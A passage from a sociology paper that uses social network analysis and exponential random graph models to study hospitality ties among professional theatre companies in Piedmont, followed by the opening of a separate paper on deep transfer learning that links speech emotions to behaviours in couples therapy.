in shaping the cultural field. Furthermore, evidence has been provided on how social network analysis, as both a theoretical and a technical set of tools, may be a common ground on which these different relational perspectives on the cultural field may inte- grate (McLean 2016; Fox 2014; Bottero and Crossley 2011; De Nooy 2003). In this sense there is a joint focus to the inquiry on culture from different theories and ap- proaches, with the possibility of agreement on some aspects of its relational founda- tion. But in spite of the possibility of a general common relational look on culture, there is a risk arising from the application of network methods to a complex and mul- tifaceted phenomenon like culture: the ex- cess of description. Network analysis, as a methodological toolbox, must be applied in the light of a comprehensive theoretical framework in order to provide meaningful explanations, and not just meticulous de- scriptions of cases. Having declared this theoretical need, it must be stated that at the point at which research has arrived to- day in this field, we cannot count on a co- herent and well defined perspective on re- lations and cultural production. At the same time our aim is not to use the case under our observation to verify one specif- ic theory. Rather, from the review of dif- ferent theories and empirical studies, we propose an inductive theoretical path, from which will emerge a possible common framework for the analysis of relations within cultural fields. 2.2 Strategic and genetic networking There is increasing interest in the empirical analysis of the cultural field through net- works. Researches in different artistic and cultural domains have in common the use of networks as lenses on consumption or production processes. What distinguishes these researches is the different, even if not mutually exclusive, function they attribute to networks. On the one hand networks may be seen as the result of a set of indi- vidual properties or abilities that are used in the field in a strategic way in order to follow specific goals. On the other hand networks are used with their structural properties in order to understand some ge- netic characteristics of the field and the so- cial processes behind it. Based on these in- terpretations, grounded in the thought of the above-mentioned authors, we can dis- tinguish a strategic and a genetic function of networks. The strategic function of networks refers to the (conscious or subconscious) deployment of relational resources within a field with the result of increasing the chances of achieving an objective. In contemporary literature on cul- tural production there are some empirical examples of such a strategic role of rela- tions. For example research on institutional networks in the cultural field, like festival networks (Gallelli 2016) and museum con- sortia (Bagdadli 2003), shows important results about network creation processes and the way in which the relations support economic performance. For some subjects, the lack of economic capital may be inte- grated with relational resources, allowing a weak organization to survive in the market. The availability of “complementary re- sources”, like networks, is considered a key factor in the formation of alliances. Studying the fashion industry in Milan, D’Ovidio (2010) has shown that cultural workers, working together, trigger virtuous Connections Strategic and Genetic Networking 72 | Volume 37 | Issues 1&2 | insna.org mechanisms of mutual recognition and trust which support the companies in estab- lishing themselves and gaining success. These aspects are in line with a bourdesian view of capital conversion, particularly at- tuned to artistic production in which, often, the power of economic relations may be dominated by networking dynamics. The genetic function of networks refers to the relational elements embedded within a social structure, which have an in- fluence on the way in which a phenome- non eventually manifests. Research on cul- tural districts (Mizzau and Montanari 2008; Santagata 2002) shows how links between the subjects in the field foster cre- ative processes, cooperation and the supply of cultural activities, and also how rela- tions among the producers generate a ‘cre- ative atmosphere’ that supports production processes (Bertacchini and Santagata 2012). Economic sociologists also argue that in the contemporary economy, the so- cial and relational dimensions of innova- tion processes are becoming more im- portant than the organizational characteris- tics of the firms. Innovative processes grow not only inside the boundaries of the companies, but also through both formal and informal relations among them (Trigil- ia 2007). In their pioneering study on crea- tive teams in Broadway musical produc- tion, Uzzi and Spiro (2005) looked widely into the structural properties of artistic co- operation. They have shown that financial as well as artistic success is associated with medium levels of small world(ness) (see Milgram 1967) that is, sets of rela- tional configuration characterized by short global separation between the clusters and high local cohesion. Networks have also been used to demonstrate the mechanisms of diffusion of a music scene (Crossley 2009; 2008), showing how relational dynamics are as important as local historical and biograph- ical processes for the genesis of a cultural phenomenon. In a recent collection of em- pirical applications of network studies to music worlds, the relevance of the rela- tional approach for all the domains in- volved with cultural production, such as production processes, tastes, gender rela- tions, careers, and so forth has been widely proved (see Crossley et al. 2015). As Widdop states: ‘Being active in music [we can generalize in culture] is much more complex than simply basing it on theoreti- cal assumptions of class and education; it is fundamentally a social act; the level to which you engage in music [culture] and the genres you attach to are somewhat de- pendent upon the networks you are em- bedded in and position in the social struc- ture’ (2015, p. 99). Arguably, it is not rare to observe relational processes with mixed functions. For example, Starkey, Barnatt and Tempest (2000) describe the case of latent organizations: informal key configurations of stable subjects, which emerge according to social mechanisms related to trust and mutual cooperation and are employed stra- tegically for sustaining processes of pro- duction and divulgation of cultural goods and activities in the marketplace. 2.3 Networked theatre companies: research hypotheses As mentioned above, theatre companies performing in each other’s venues create a network of hospitality relations that is a relevant part of their activity. Besides the intrinsic artistic value, these relations have a strategic function and constitute genetic processes that characterize the local cultur- al offer. In our empirical case, we interpret the social status related to hospitality rela- tions, as a strategic element of the produc- tivity of the companies. The prestige of the hosting and hosted subjects (sometimes theatre websites advertise ‘prestigious hos- pitality’ alongside the company’s reper- toire) may be a vehicle of success, as in the case of small companies which manage to perform in big theatres, or small theatres that host well-established companies; in this sense the tendency to create links does Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 73 not necessarily reflect the companies’ eco- nomic resources (Hypothesis 1). This hypothesis is based on the in- terpretation of social capital as a strategic complementary resource, rather than a form of capital which increases propor- tionally to other forms of capital. It might be true in some cases that the wealthier an organization, the better its chances of at- tracting relations; but it is also true in many cases that artistic collaborations arise to support the absence of economic capital or other resources, especially in periods of crisis and for small subjects. In order to investigate some of the genetic mechanisms embedded in the rela- tions among companies, we borrow from network theory an influential concept, which may help to understand some of the processes related to network formation. The homophily argument (McPherson et al. 2001), refers to the tendency for people or organizations to form ties dispropor- tionately with others who share similar at- tributes with them. In our case, the similar- ity of organizational features between two companies may explain the emergence of recurrent patterns of artistic collaboration. Even if small companies strive to perform in big venues, it is more probable that in their daily artistic activity they will con- nect with other small subjects; and also big theatres will be more inclined to host fa- mous companies in order to ensure ade- quate ticket sales. Therefore, we can hy- pothesize that companies tend to connect to others with similar organizational char- acteristics (Hypothesis 2). Moreover, while pure market rela- tions are mostly unidirectional and based on economic convenience, artistic collabo- rations, as mentioned, may foster mutual recognition and trust, which are generated by reciprocity. Accordingly, we hypothe- size that if one company hosts another one in its own venue, there are good chances that this relation will be reciprocated (Hy- pothesis 3). Hospitality allows information transmission, as it implies direct contacts between the two subjects. These kinds of relations produce a fund of information within a defined territory, knowledge of who works with whom, the prospect of possible collaborators, useful information about the characteristics of the other sub- jects and the market conditions in which they operate. Nonetheless, hospitality may ensure a certain margin of uncertainty con- trol. Even in periods of crisis, companies embedded in dense networks of collabora- tions, may count on a greater possibility of performing, compared to isolated ones. As a result, relations among companies tend to be embedded in dense groups (Hypothesis 4). Successful cultural cooperation is likely to result in relational configurations that are more complex than simple reciprocal dyads. Especially in local cultural markets in which there are small geographical sepa- rations among the subjects, we expect to find triadic closure, that is, relations in which, if subjects A and B are connected, and A and C are connected, B and C will also probably share a link. This is one of the typical (genetic) mechanisms that can be found in creative contexts, such as cul- tural clusters, ‘art worlds’ or scenes, in which widespread collaboration and rela- tional closure are tangible. 3. Data and methods 3.1 Data Our empirical analysis is based on data about hospitality shows in Piedmont, Italy, among professional companies. The source of the (anonymized) data is the Cultural Observatory of Piedmont (OCP), a private organization in partnership with the region, which conducts research in the field of cul- tural goods and activities. For the selection of the subjects involved in the study we followed the definition of ’professional company’ according to the regional law 68/1980 concerning the system of public contribution to theatre activities. Public funds are distributed to companies on the basis of criteria concerning artistic and economic standards, such as a minimum number of shows per year or the number of Connections Strategic and Genetic Networking 74 | Volume 37 | Issues 1&2 | insna.org paid hours per actor. Our data concern all the companies that met the regional criteria in 2011. As a result we were able to recon- struct the whole network of the 46 regional professional companies in that year. The ties are directed, where the direction indi- cates if the company was the hosting sub- ject (incoming relation) or the one that per- formed the show (outgoing relation). Data about individual characteris- tics of the companies were also available, concerning some economic and perfor- mance indicators. 3.2 ERGM For our analyses we applied both the de- scriptive analytical tools available with UCINET software (Borgatti et al 2002) and statistical modelling for network data. Exponential random graph (ERG) family models (Lusher et al 2013; Robins et al 2007) have the purpose of explaining the different interwoven mechanisms respon- sible for shaping the network as we empir- ically observe it. They are designed to deal with types of effects at different analytical levels. In our case we consider nodal at- tributes, which are organizational and eco- nomic characteristics of the companies, and structural effects, network configura- tions useful for capturing endogenous so- cial mechanisms. Relational social dynamics, by def- inition, violate the assumption of inde- pendence of the observations on which standard statistical models are based, thus ERG models are explicitly designed in or- der to include the mutual dependence of the nodes22. As a result ERG models are appropriate to our purposes because they meet both a technical need – the fact that two companies are tied makes them mutu- ally dependent – and the theoretical rele- 22 Where the models do not include any network effects, as the following model 1, the ERG mod- els are similar to traditional logistic regression models, analyzing the presence or absence of a relation between two nodes as dependent varia- ble. vance of analyzing the joint effect of indi- vidual and structural determinants. 3.3 Variables and models In the first part of the analysis we analyze relational metrics useful for describing the general structural properties of our net- work. Secondly we present two models, the first one with only nodal attributes, with the aim of understanding which indi- vidual characteristics of the companies ex- plain the emergence of artistic links. Among these variables we consider the age of the companies, to control the fact that older companies might have a wider knowledge of the other subjects in- volved in the field and consequently more chances to connect with them. Secondly, we analyze the impact of the amount of funding (expressed in mil- lions of euro) received by the company, as a proxy for its economic resources, on the probability of sending (NODEOCOV) and receiving (NODEICOV) ties, in order to understand how the relational behavior of a company is related to its economic capaci- ty. Moreover, with the aim of testing the homophily hypothesis (explained above), we consider a set of variables re- garding the overall audience of the compa- nies (through the total number of tickets is- sued, including free ones, divided into 3 classes: up to 10000 tickets per year; from 10001 to 30000; over 30000), the city in which the company is settled (four Pied- montese provinces), and the number of shows performed in schools (as a proxy for a more education-oriented, rather than a more market-oriented artistic behavior of the company). In model 2 we add structural ef- fects. Reciprocity concerns a mutual rela- tion between two companies: if they each host and are hosted by others, this indicates a strong and clustered artistic collabora- tion. Secondly we analyze popularity and expansiveness effects, observed re- spectively by GWIDEGREE and Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 75 GWODEGREE statistics. These parame- ters control for particularly unbalanced de- gree distributions, concerning respectively incoming and outgoing relations. These are useful to understand if the field is domi- nated, on the one hand, by subjects who at- tract the majority of the other companies, and, on the other hand, if there are some subjects particularly active and known in the field who perform in most of the local theatres. Lastly, the model also includes transitivity and hierarchy mechanisms. In the first case we control for transitive clo- sure through the geometrically weighted edgewise shared partners (GWESP) pa- rameter. It captures the typical triangular pattern, in which actor a is connected to actor b, actor b is connected to actor c, which in turn is connected to actor a. This configuration is particularly relevant in or- der to catch clusters of companies with cultural-artistic uniformities that tend to collaborate. On the other hand, in the sec- ond case, we control for the presence of hierarchical configurations in the network. The GWDSP parameter (geometrically weighted dyadwise shared partners) catch- es the tendency in the field for some com- panies who do not collaborate, to be at least indirectly connected to a common third company, showing a more hierar- chical, non-triangular, configuration. 4. Analysis 4.1 Network descriptives Figure 1, elaborated with Gephi (Bastian et al. 2009), is a graphical representation of the 120 hospitality relations among the 46 companies. As mentioned, the direction of the arrow indicates whether the company is performing or hosting; the size of the node is proportional to the degree of the compa- ny (also indicated inside the circle), irre- spective of the direction of the relations. The different colors of the nodes aim to give a general indication of the level of embeddedness of the companies in local clusters with dense sub-networks. The al- gorithm (Blondel et al. 2008) is a heuristic method based on modularity optimization, useful for unfolding the community struc- tures of networks. As we can see there are four sub-groups of companies with greater levels of density inside the groups than outside. This gives a first general indica- tion of the fact that in our field of observa- tion there is a certain degree of recurrent collaboration among some actors, which makes the cultural offer somewhat seg- mented. Connections Strategic and Genetic Networking 76 | Volume 37 | Issues 1&2 | insna.org Figure 1: Network of hospitality relations among professional theatre companies in Piedmont, 2011 So, to what extent do the compa- nies connect with one another? The density of the overall directed network is 0.058 (Table 1), meaning that almost 6% of all the possible connections among all the nodes is actually present. If we do not con- sider the direction of the collaborations, regardless of whether a company is hosting or performing a show, but just considering the presence of a relation between them, the density is around 10%. Generally speaking this is not a particularly high lev- el of density, but it is high enough consid- ering that our cases are theatre companies potentially in competition within the mar- ket of the cultural offer of a territory. The general high level of connection among the companies is also shown by the average degree, indicating that, regardless of the di- rection of the collaboration, one company is tied on average with 4.7 others. Centralization metrics, in particular the in-centralization value of around 40%, shows that if there is, we can say, a diffuse local cultural collaboration in the whole field shown by the presence of many dy- ads, at the same time some theatres (in Figure 1 two of them are immediately visi- ble) have a higher propensity to host. These may be recognized as well-known venues, in which probably every company aims to perform in order to gain visibility and success. In every local cultural scene there are one or two theatres which are considered the best (or simply the biggest) ones. In spite of these market characteris- tics, the field seems to be quite accessible and open, for example there is an average distance of about 2.5 between any two companies, meaning that even if I did not collaborate with a specific company which I am interested in, I probably know some- one who did; this general feature of the field is useful for matters regarding not on- ly direct collaboration, but also for easy access to information and formation of conventions. On that line, the clustering coefficient shows that on average over 40% of companies connected to a focal one, are in turn in touch with one another. Table 1: Network descriptives directed un-directed Density 0.058 0.105 Avg. degree 2.609 4.739 In-centralization 0.395 0.392 Out-centralization 0.122 - Avg. distance 2.897 2.537 Avg. clustering coeff 0.231 0.414 Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 77 So far we have focused on the gen- eral structural features of the field. These are important as tools to describe the rela- tional dimension of our observation con- text; but also considering that the network properties reflect the underlying social mechanisms responsible for the formation and the maintenance of the network itself. This perspective has deep theoretical roots in sociological thinking. For example, new economic sociology (Granovetter 1985) in- terprets economic phenomena as embed- ded in systems of social relations. Moreo- ver, following Harrison White (1981), markets emerge from the interactions of producers, who relate to and observe each other trying to satisfy consumer’s requests. Thus, particular structural properties are functional to the circulation of information, the formation of reputation, alliances and competitions. For example, Becker’s (1982) ar- gument, in contrast to the classical theory of reputation in arts, is that reputation is formed and carried on within art worlds, and does not only depend on the artistic object itself. In this sense, the structural properties of an artistic field are indeed in- dicators of the social conditions in which information and judgments flow in real contexts. 4.2 Models We now present the results of the models, which include individual and structural variables. We read the results as the impact of the single parameters on the tendency of forming a tie between any two companies, uncovering individual properties and en- dogenous mechanisms that are responsible for shaping the network. Significant effects are presented in bold in Table 2.23 The first parameter, edg- es, in both models is negative and signifi- cant; we interpret this variable as the inter- cept in standard regression models. In this case it indicates that the probability of ob- serving an edge, i.e. a couple of compa- nies, outside any other possible more com- plex relational configuration is negative; this value does not imply any substantive explanation, it simply indicates that the re- lational behaviors of the companies are ac- tually embedded in more complex social structures than dyads. In model 1 significant coefficients are: funding in degree, audience homophi- ly for class 3 and school performances. These variables have a positive effect, even though it is not particularly strong for funding and school performances, on the probability of forming ties. These effects can be interpreted as follows: a) there is a tendency for companies which get higher public economic support to have incoming relations; b) big companies tend to share ties with one another more than they do with smaller companies; c) the greater the difference in the number of shows per- formed in schools between two companies, the greater is the probability for them to share a tie, indicating relational heterophily based on the number of shows performed for students. This implies that sharing a more educational theatre activity is not a predictor of preferential connection among companies. 23 The models have been estimated using Statnet package for ERG models in R (Handcock et al., 2010) Connections Strategic and Genetic Networking 78 | Volume 37 | Issues 1&2 | insna.org Table 2: ERG models of tie formations among theatre companies Model 1 Model 2 Edges -3.835 -3.197 (0.378) (0.357) Age 0.007 0.004 (0.009) (0.007) Funding out degree (NODEOCOV) -0.953 -0.924 (0.587) (0.654) Funding in degree (NODEICOV) 1.766 1.171 (0.313) (0.323) City (NODEMATCH) 0.161 0.095 (0.220) (0.171) Audience homophily class 1 (NODEMATCH) 0.766 0.742 (0.423) (0.350) Audience homophily class 2 (NODEMATCH) -0.184 0.070 (0.361) (0.330) Audience homophily class 3 (NODEMATCH) 1.151 0.651 (0.258) (0.216) School performances (ABSDIFF) 0.002 0.002 (0.001) (0.001) Reciprocity 1.103 (0.463) Popularity (GWIDEGREE) -1.719 (0.484) Expansiveness (GWODEGREE) -0.560 (0.517) Transitivity (GWESP) 0.472 (0.190) Hierarchy (GWDSP) -0.070 (0.052) AIC 816.8 787.2 BIC 867.5 866.1 Standard errors in brackets. Values in bold indicate significance at 0.05 level Economic funding, audience levels and educational activity are variables that con- cern some individual characteristics of the companies. In the second model we added five structural variables in order to control Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 79 for endogenous relational mechanisms.24 At a general level, model 2 is better speci- fied than model 1, as shown by AIC and BIC statistics which show lower values. Like model 1, model 2 also has a significant, though weak, effect of funding. This partially disproves Hypothesis 1. In fact, if tie formation was independent from funding we would expect no effect at all. We see from one side no relation between funding and out degree, meaning that companies have outgoing relations regard- less of the different levels of public fund- ing they get; but on the other side incom- ing relations are somehow supported by higher levels of public contribution. This does not indicate a generalized influence of the funding on the tendency to connect with others, but probably a particular char- acteristic of the field that concerns a higher dependency of hosting institutions on pub- lic economic resources (probably the big and famous theatres we mentioned before). Compared to model 1, in model 2 also audience homophily for class 1 is pos- itive and significant, meaning that, when controlling for endogenous mechanisms, the tendency to host one another emerges also for small companies. This result con- firms Hypothesis 2, reinforcing the vision of a field in which there is a polarized clus- tering tendency among theatre companies. Even if small companies probably aspire to perform in big venues, the whole field is actually characterized by groups of com- panies with similar audience levels which collaborate. This is a sign of what Lazars- feld and Merton (1954) called ‘status ho- mophily’, a process that leads people or organizations to connect with others of close social standing to themselves. Reciprocity is positive and signifi- cant, this indicates that in the network of theatre hospitality, if one company hosts another one for a show it, in turn, will probably be hosted by the other company. These mechanisms of tie reciprocation show the presence of diffused collabora- tion exchange, confirming Hypothesis 3. 24 The model has good convergence. In appendix A we attach the GOF diagnostic graphs. The negative and significant coeffi- cient for popularity (GWIDEGREE) indi- cates that there is not much variation among hosting companies in their tenden- cy to attract others, meaning that there is a quite uniform distribution of incoming re- lations in the field. In the previous section we showed a high centralization coeffi- cient, indicating that there are some com- panies that attract ties more than others, but probably this characteristic involves a minor part of the relations, making the in degree distribution not particularly skewed. The non-significant coefficient for expansiveness (GWODEGREE) suggests there is no clear tendency for some com- panies to be disproportionally central per- formers, again showing a structure of the field not particularly dominated by a few central companies. GWDSP, used as a measure of hi- erarchy in the network, is negative but not significant; while transitivity is positive and significant. This shows the existence of clustered social relations, confirming Hypothesis 4, in which company a and company b, which share a tie, will both probably be connected to company c. 5. Discussion and conclusions Hospitality in theatre is an inherently rela- tional phenomenon, and with their links the companies shape the local cultural of- fer. The analyses in the present article have contributed to show the relevance of the network perspective on a cultural field, and the fact that where there are relations among the subjects involved, we can effec- tively use formal methods to describe their strategic and genetic elements. To go back to our starting ques- tions, what do we know about theatre companies that collaborate? First of all we know that they do it. More precisely we know that companies which get more pub- lic funding tend to host more; we know there is a homophily effect based on audi- ence levels, and this polarizes the field into two separated groups of big and small companies which connect within their Connections Strategic and Genetic Networking 80 | Volume 37 | Issues 1&2 | insna.org group but not between the groups; we know that companies tend to reciprocally perform in one another’s venues and their relations are transitive, forming clusters of close collaborations. A description of the field based on- ly on individual attributes would not be sufficient to understand the way in which cultural agents occupy specific positions within the social space of the cultural pro- duction in a local territory. In our analyses model 2, compared to model 1, provides a more articulated image of the network, in which there are some endogenous mecha- nisms, such as reciprocity and transitivity, which contribute to shape the local cultural offer. These results, even though they come from a particular case, add some knowledge to our understanding of the cul- tural field. All the theoretical perspectives in line with a relational look on culture may be effectively integrated by the use of formal network methods. The idea of net- works as a complementary resource held by the cultural producers echoes Bour- dieu’s definition of social capital. It is known that Pierre Bourdieu did not sympa- thize with network analysis; rather than looking for visible and direct links he aimed to capture invisible and objective social relations. Technically Bourdieu pur- sued this goal by using methods for detect- ing latent dimensions, such as the famous application of multiple correspondence analysis on tastes. But today in sociologi- cal and methodological literature there are empirical demonstrations of the compati- bility of the two approaches. As De Nooy (2003) states, concrete relations (like the ones analyzed by social network analysis) may be useful to identify deeper field rela- tions; or, following Bottero and Crossley (2011), shared habitus can be explained by means of social processes such as mutual influence, which take place among people who also share interaction and concrete re- lationships. In our case we have shown that collaborative relations may support the ar- tistic activity of companies which look for venues in which to perform: companies who are able to convert their relations into shows get better chances in the market. This is close to an interpretation in terms of social capital conversion into economic capital, a hypothesis which would be in line with the bourdesian repertoire. Furthermore, the aspects related to the ways in which theatre companies con- nect, forming reciprocal collaborations and closed triads, constitute genetic character- istics of cultural markets. These can inte- grate the analysis of the production of cul- ture perspective concerning the influence of the industry structure on the presence of particular products on the market. This is certainly an interesting topic, and one that is open to future research, because it bridg- es the analysis of production to the analy- sis of consumption. A possible future re- search question is: is there a relation be- tween the ways in which the producers re- late to each other and the types of products that they will offer? This topic was partial- ly addressed by Paul DiMaggio (1977) who proposed an approach to the study of cultural products starting from the knowledge of the market structure and productive processes. Integrating such an approach with network insights would cer- tainly lead to innovative discoveries. Last but not least, the relational di- mension of cultural production is a useful issue also for policy research. We know that networks support producers’ activity in many ways, providing resources, infor- mation, collaborations and so forth. A greater attention of policy makers to the re- lational dimension of cultural markets may encourage institutionalization processes aimed at diffusing the benefits of network- ing also to more isolated subjects and, like- ly, at integrating the lack of public eco- nomic resources. Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 81 References Bagdadli, S. (2003). Museum and Theatre Networks in Italy: Determinants and Typology. International Journal of Arts Management, 6(1), pp. 19–29. Bastian M., Heymann S., Jacomy M. (2009). Gephi: an open source software for exploring and manipu- lating networks. International AAAI Conference on Weblogs and Social Media. Becker, H.S. (1982). Art worlds. University of Cali- fornia Press, Berkeley. Bertacchini, E., Santagata, W. (2012). Atmosfera crea- tiva. Il Mulino, Bologna. Blondel, V.D., Jean-Loup, G., Lambiotte, R., Lefebvre, E. (2008). Fast unfolding of communi- ties in large networks. Journal of Statistical Me- chanics: Theory and Experiment, (10), p. 1000. Borgatti, S.P., Everett, M.G., Freeman, L.C. (2002). Ucinet for Windows: Software for Social Network Analysis. Analytic Technologies. Harvard, MA. Available at: https://sites.google.com/site/ucinetsoftware/home Bottero, W., Crossley, N. (2011). Worlds, Fields and Networks: Becker, Bourdieu and the Structures of Social Relations. Cultural Sociology 5(1), pp. 99– 119. Bourdieu, P., (1986). The forms of capital. In Richard- son, J.G. (ed.), Handbook of Theory and Research For the Sociology of Education. Greenwood, New York, NY, pp. 241–58. Crossley, N. (2008). Pretty Connected: The Social Network of the Early UK Punk Movement. Theo- ry, Culture & Society, 25(6), pp. 89–116. Crossley, N. (2009). The Man Whose Web Expanded: Network Dynamics in Manchester’s Post/PunkMusic Scene 1976–1980. Poetics, 37(1), pp. 24–49. Crossley, N., McAndrew, S., Widdop, P. (2015). So- cial networks and music worlds. Routledge, New York. D’Ovidio, M. (2010). Network locali nell’economia cognitiva-culturale. Il caso di Milano. Rassegna italiana di sociologia, 3, pp. 459–83. De Nooy, W. (2003). Fields and networks: corre- spondence analysis and social network analysis in the framework of field theory. Poetics 31(5), pp. 305–27. DiMaggio, P. (1977). Market structure, the creative process and popular culture: toward an organiza- tional reinterpretation of mass-culture theory. Journal of Popular Culture, 11(2), pp. 436–52. Fox, E. (2014). Bourdieu’s Relational View of Inter- actions: A Reply to Bottero and Crossley. Cultural Sociology, 8(2), pp. 204–11. Gallelli, A. (2016). Social Structure and Cultural Pro- duction: An Empirical Analysis of Festivals' Net- works. The Journal of Arts Management, Law, and Society, 46(1), pp. 34–46. Granovetter, M. (1985). Economic Action, Social Structure: The Problem of Embeddedness. Ameri- can Journal of Sociology, 91, pp. 481–510. Handcock, M.S., Hunter, D.R., Butts, C.T., Goodreau, S.M., & Morris, M. (2008). Statnet: Software tools for the representation, visualization, analysis and simulation of network data. Journal of Statistical Software, 24(1), p. 1548. Lazarsfeld, P.F., Merton, R.K. (1954). Friendship as a social process: a substantive and methodological analysis. In Freedom and Control in Modern Soci- ety. M Berger, T. Abel and C. Page (eds), pp. 18– 66. New York: Van Nostrand. Lusher, D., Koskinen, J., Robins, G. (2013). Exponen- tial Random Graph Models for Social Networks. Theory, Methods, and Applications. Cambridge University Press, Cambridge. McLean, P. (2016). Culture in Networks. John Wiley & Sons, Hoboken. McPherson, M., Smith-Lovin, L., Cook, J.M. (2001). Birds of a Feather: Homophily in Social Networks. Annual Review of Sociology, 27, pp. 415–44. Milgram, S. (1967). The small world problem. Psy- chology Today, 1(1), pp. 61–7. Mizzau, L., Montanari, F. (2008). ‘Cultural districts and the challenge of authenticity: the case of Piedmont, Italy’. Journal of Economic Geography, n.8, pp. 651–73. Peterson, A., Anand, N. (2004). The production of culture perspective. Annual Review of Sociology, 30, pp. 311–34. Robins, G., Pattison, P., Kalish, Y., Lusher, D. (2007). An introduction to exponential random graph (p*) models for social networks. Social Networks, 29, pp. 173–91. Santagata, W. (2002). Cultural districts, property rights and sustainable economic growth. Interna- tional journal of urban and regional research, n. 26, pp. 181–204. Starkey, K., Barnatt, C., Tempest, S., 2000. Beyond Networks and Hierarchies: Latent Organizations in the UK Television Industry. Organization science, 11(3), pp. 299–305. Trigilia, C. (2007). La costruzione sociale dell’innovazione. Economia, società e territorio. Firenze University Press, Firenze. Uzzi, B., Spiro, J. (2005). Collaboration and Creativi- ty: The Small World Problem. American Journal of Sociology, 111(1), pp. 447–504. White, H. (1981). Where Do Markets Come From? American Journal of Sociology, 87, pp. 517–47. Widdop, P. (2015). Music consumption: networks and omnivorism. In Crossley, McAndrew, Widdop (eds). Social Networks and Music Worlds. Routledge, New York Connections Strategic and Genetic Networking 82 | Volume 37 | Issues 1&2 | insna.org Appendix A Figure A: Goodness of fit plots, model 1 Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 83 Figure B: Goodness of fit plots, model 2 Connections Strategic and Genetic Networking 84 | Volume 37 | Issues 1&2 | insna.org Figure C: Diagnostics model 2 work_hscp7elrtfakfkfv4zzrbyj23q ---- Submitted 11 June 2019 Accepted 14 November 2019 Published 6 January 2020 Corresponding author Haoqi Li, haoqili@usc.edu Academic editor Meeyoung Cha Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.246 Copyright 2020 Li et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Linking emotions to behaviors through deep transfer learning Haoqi Li1, Brian Baucom2 and Panayiotis Georgiou1 1 Department of Electrical and Computer Engineering, University of Southern California, Los Angeles, CA, United States of America 2 Department of Psychology, University of Utah, Salt Lake City, UT, United States of America ABSTRACT Human behavior refers to the way humans act and interact. Understanding human behavior is a cornerstone of observational practice, especially in psychotherapy. An important cue of behavior analysis is the dynamical changes of emotions during the conversation. Domain experts integrate emotional information in a highly nonlinear manner; thus, it is challenging to explicitly quantify the relationship between emotions and behaviors. In this work, we employ deep transfer learning to analyze their inferential capacity and contextual importance. We first train a network to quantify emotions from acoustic signals and then use information from the emotion recognition network as features for behavior recognition. We treat this emotion-related information as behavioral primitives and further train higher level layers towards behavior quantifica- tion. Through our analysis, we find that emotion-related information is an important cue for behavior recognition. Further, we investigate the importance of emotional- context in the expression of behavior by constraining (or not) the neural networks’ contextual view of the data. This demonstrates that the sequence of emotions is critical in behavior expression. To achieve these frameworks we employ hybrid architectures of convolutional networks and recurrent networks to extract emotion-related behavior primitives and facilitate automatic behavior recognition from speech. Subjects Emerging Technologies, Natural Language and Speech, Social Computing Keywords Behavior quantification, Emotion, Affective computing, Neural networks, Couples therapy INTRODUCTION Human communication includes a range of cues from lexical, acoustic and prosodic, turn taking and emotions to complex behaviors. Behaviors encode many domain-specific aspects of the internal user state, from highly complex interaction dynamics to expressed emotions. These are encoded at multiple resolutions, time scales, and with different levels of complexity. For example, a short speech signal or a single uttered word can convey basic emotions (Ekman, 1992a; Ekman, 1992b). More complex behaviors require domain specific knowledge and longer observation windows for recognition. This is especially true in task specific behaviors of interest in observational treatment for psychotherapy such as in couples’ therapy (Christensen et al., 2004) and suicide risk assessment (Cummins et al., 2015). Behaviors encompass a rich set of information that includes the dynamics of interlocutors and their emotional states, and can often be domain specific. The evaluation and identification of domain specific behaviors (e.g., blame, suicide ideation) can facilitate How to cite this article Li H, Baucom B, Georgiou P. 2020. Linking emotions to behaviors through deep transfer learning. PeerJ Comput. Sci. 6:e246 http://doi.org/10.7717/peerj-cs.246 https://peerj.com/computer-science mailto:haoqili@usc.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.246 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.246 effective and specific treatments by psychologists. During the observational treatment, annotation of human behavior is a time consuming and complex task. Thus, there have been efforts on automatically recognizing human emotion and behavior states, which resulted in vibrant research topics such as affective computing (Tao & Tan, 2005; Picard, 2003; Sander & Scherer, 2014), social signal processing (Vinciarelli, Pantic & Bourlard, 2009), and behavioral signal processing (BSP) (Narayanan & Georgiou, 2013; Georgiou, Black & Narayanan, 2011). In the task of speech emotion recognition (SER), researchers are combining machine learning techniques to build reliable and accurate affect recognition systems (Schuller, 2018). In the BSP domain, through domain-specific focus on areas such as human communication, mental health and psychology, research targets advances of understanding of higher complexity constructs and helps psychologists to observe and evaluate domain-specific behaviors. However, despite these efforts on automatic emotion and behavior recognition (see ‘Related Work’), there has been less work on examining the relationship between these two. In fact, many domain specific annotation manuals and instruments (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998; Heyman, 2004) have clear descriptions that state specific basic emotions can be indicators of certain behaviors. Such descriptions are also congruent with how humans process information. For example, when domain experts attempt to quantify complex behaviors, they often employ affective information within the context of the interaction at varying timescales to estimate behaviors of interest (Narayanan & Georgiou, 2013; Tseng et al., 2016). Moreover, the relationship between behavior and emotion provides an opportunity for (i) transfer learning by employing emotion data, that is easier to obtain, annotate, and less subjective, as the initial modeling task; and (ii) employing emotional information as building blocks, or primitive features, that can describe behavior. The purpose of this work is to explore the relationship between emotion and behavior through deep neural networks, and further the employ emotion-related information towards behavior quantification. There are many notions of what an ‘‘emotion’’ is. For the purpose of this paper and most research in the field (El Ayadi, Kamel & Karray, 2011; Schuller, 2018), the focus is on basic emotions, which are defined as cross-culturally recognizable. One commonly used discrete categorization is by Ekman (1992a); Ekman (1992b), in which six basic emotions are identified as anger, disgust, fear, happiness, sadness, and surprise. According to theories (Schacter, Gilbert & Wegner, 2011; Scherer, 2005), emotions are states of feeling that result in physical and psychological changes that influence our behaviors. Behavior, on the other hand, encodes many more layers of complexity: the dynamics of the interlocutors, their perception, appraisal, and expression of emotion, their thinking and problem-solving intents, skills and creativity, the context and knowledge of interlocutors, and their abilities towards emotion regulation (Baumeister et al., 2007; Baumeister et al., 2010). Behaviors are also domain dependent. In addiction (Baer et al., 2009), for example, a therapist will mostly be interested in the language which 